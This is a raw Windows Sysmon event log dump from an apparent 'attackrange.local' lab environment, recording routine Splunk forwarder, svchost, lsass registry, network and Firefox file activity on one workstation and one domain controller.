Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57266-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638710Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:56.912{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66E672B61B82A33AC5AEBB68FC9501A4,SHA256=B1C7A15D7F5493C359076DAE081D0D4B4AD6C71D9B327DAE7348363085B3C4B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638709Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:56.725{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D679FFDCC85F579D550C813C197898B5,SHA256=9C91038F7B0CDE26C7DD9A5282392A242FE13C5399E08248CF35E12B6EA04476,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918421Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:56.749{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918420Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:56.749{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918419Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:53.770{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1050-false10.0.1.12-8000- 23542300x80000000000000005918418Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:56.245{896A638B-C9AE-6058-4C07-00000000AE01}3420ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\oktd6i2n.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918417Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:56.244{896A638B-C9AE-6058-4C07-00000000AE01}3420ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\oktd6i2n.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=F99F483CADA707FF9ED491DC220B123D,SHA256=B0E3F9C6D8E3BA4097FECE7100A83F649CC0ABD52A4B0721BC0E44AED7477447,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918416Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:56.175{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=159EF8F0A52EB3FF6799B294649FBED0,SHA256=8E3696731466108C2B7283FDFB951144CA02CCD84DF7D70CFFA9AF1A91084C56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918415Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:56.103{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E61C64243B4CE375C9F3AB1E5B7B0A4F,SHA256=2F290A98EA7A7A48E441F57FBC6DBF69E412E8A8727FD645DD828D778D27D7F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638711Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:57.866{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7BA4D91B41728EFC5DCC0D17BBE643C,SHA256=1C01C234A5489F04B9CF00B0CCC0B851985B18F170ED97F0F8DF77B8B51CCF79,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918424Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:57.749{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918423Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:57.749{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918422Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:57.207{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DDCD9C7CE42C224EFD79F9D1903DF4C,SHA256=90E3C1903712F6ECF9EE8227FA093BDE81B3D86D6067BB2B428AF2607E19C3AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638712Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:58.897{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7661D7EFCA16CDCEF33A5393C4783BAF,SHA256=DBE858888B7029875AEBBEC4E99B58B992B912FCC39A6A1F78AA58208EFCF70F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918427Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:58.750{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918426Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:58.750{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918425Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:58.219{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D88FEE1706B5CC914D2E0834BDA3EDA3,SHA256=CFAAF9DF22421CCA3257B215D8F5AABE11290AD44946511EB81A43811CA9BA62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638715Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:59.912{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=304AB2B24DB3DFC13AC5E57130D226C1,SHA256=BF1808E6573BFC63E6072E096BC672AF26B10B03CCB91AF065C4649C64520709,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918430Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:59.750{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918429Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:59.750{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918428Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:59.232{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C7ECA636A70EE2015B03BF547D1D2C3,SHA256=542E5ECE32FF51F89B0A8D3DFB8A40E41881BBB948083623486F429241C32903,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638714Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.520{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57267-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638713Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:59.288{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F87F52BADE400F10DA2B1BF5062D7B03,SHA256=C31679259B600C5DF152E5B1F865137C7E67026A04C8C203428B66C77B6598D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638726Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:00.928{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3069C3B153171C7EE0F782A75A6BDF2,SHA256=2FB1E1E2AF62D445FCDB9372435472842AC9DE37B5FD10BF15004B8C8C71E8EC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918433Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:00.750{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918432Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:00.750{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918431Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:00.246{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B0102A3FE724809523826404903DEB5,SHA256=1C0F6AE6944D70B01438655EC2875EC882A715D75DEF1183B0F8B3B51BD510CE,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000638725Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-SetValue2021-03-24 21:51:00.022{BFB545BB-B865-6058-0B00-00000000AF01}844C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000638724Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-SetValue2021-03-24 21:51:00.022{BFB545BB-B865-6058-0B00-00000000AF01}844C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0ba7f6c6) 13241300x8000000000000000638723Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-SetValue2021-03-24 21:51:00.022{BFB545BB-B865-6058-0B00-00000000AF01}844C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d720ef-0x648373de) 13241300x8000000000000000638722Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-SetValue2021-03-24 21:51:00.022{BFB545BB-B865-6058-0B00-00000000AF01}844C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d720f7-0xc647dbde) 13241300x8000000000000000638721Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-SetValue2021-03-24 21:51:00.022{BFB545BB-B865-6058-0B00-00000000AF01}844C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d72100-0x280c43de) 13241300x8000000000000000638720Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-SetValue2021-03-24 21:51:00.022{BFB545BB-B865-6058-0B00-00000000AF01}844C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000638719Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-SetValue2021-03-24 21:51:00.022{BFB545BB-B865-6058-0B00-00000000AF01}844C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0ba7f6c6) 13241300x8000000000000000638718Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-SetValue2021-03-24 21:51:00.022{BFB545BB-B865-6058-0B00-00000000AF01}844C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d720ef-0x648373de) 13241300x8000000000000000638717Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-SetValue2021-03-24 21:51:00.022{BFB545BB-B865-6058-0B00-00000000AF01}844C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d720f7-0xc647dbde) 13241300x8000000000000000638716Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-SetValue2021-03-24 21:51:00.022{BFB545BB-B865-6058-0B00-00000000AF01}844C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d72100-0x280c43de) 10341000x8000000000000000638741Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:01.944{BFB545BB-B445-605B-335A-00000000AF01}9362004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000638740Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:01.944{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A497113ED217BBA93C7EB50C928CE162,SHA256=FB79A356D525FE7E7B7C64EC6FF4297FE295ACA82A7168973945A80627CE5E53,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918440Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:01.751{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918439Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:01.751{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918438Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:58.898{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1051-false10.0.1.12-8000- 23542300x80000000000000005918437Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:01.307{896A638B-C9AE-6058-4C07-00000000AE01}3420ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\oktd6i2n.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmMD5=3334078A4A5663D3541F203E8B773775,SHA256=CE2057FCDE9A498900C13A6E83A21FA07F32B9742EAA6118630EEB7B71BBED51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918436Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:01.256{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4137FDA5A586F357AB630EBD76F045D7,SHA256=D39F6D4DD2B1DA9C0F06B423E72555CA4C77E1F696A7B420FC3D434D02FC820B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000638739Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:01.803{BFB545BB-B8FB-6058-A600-00000000AF01}8083700C:\Windows\system32\conhost.exe{BFB545BB-B445-605B-335A-00000000AF01}936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638738Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:01.803{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638737Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 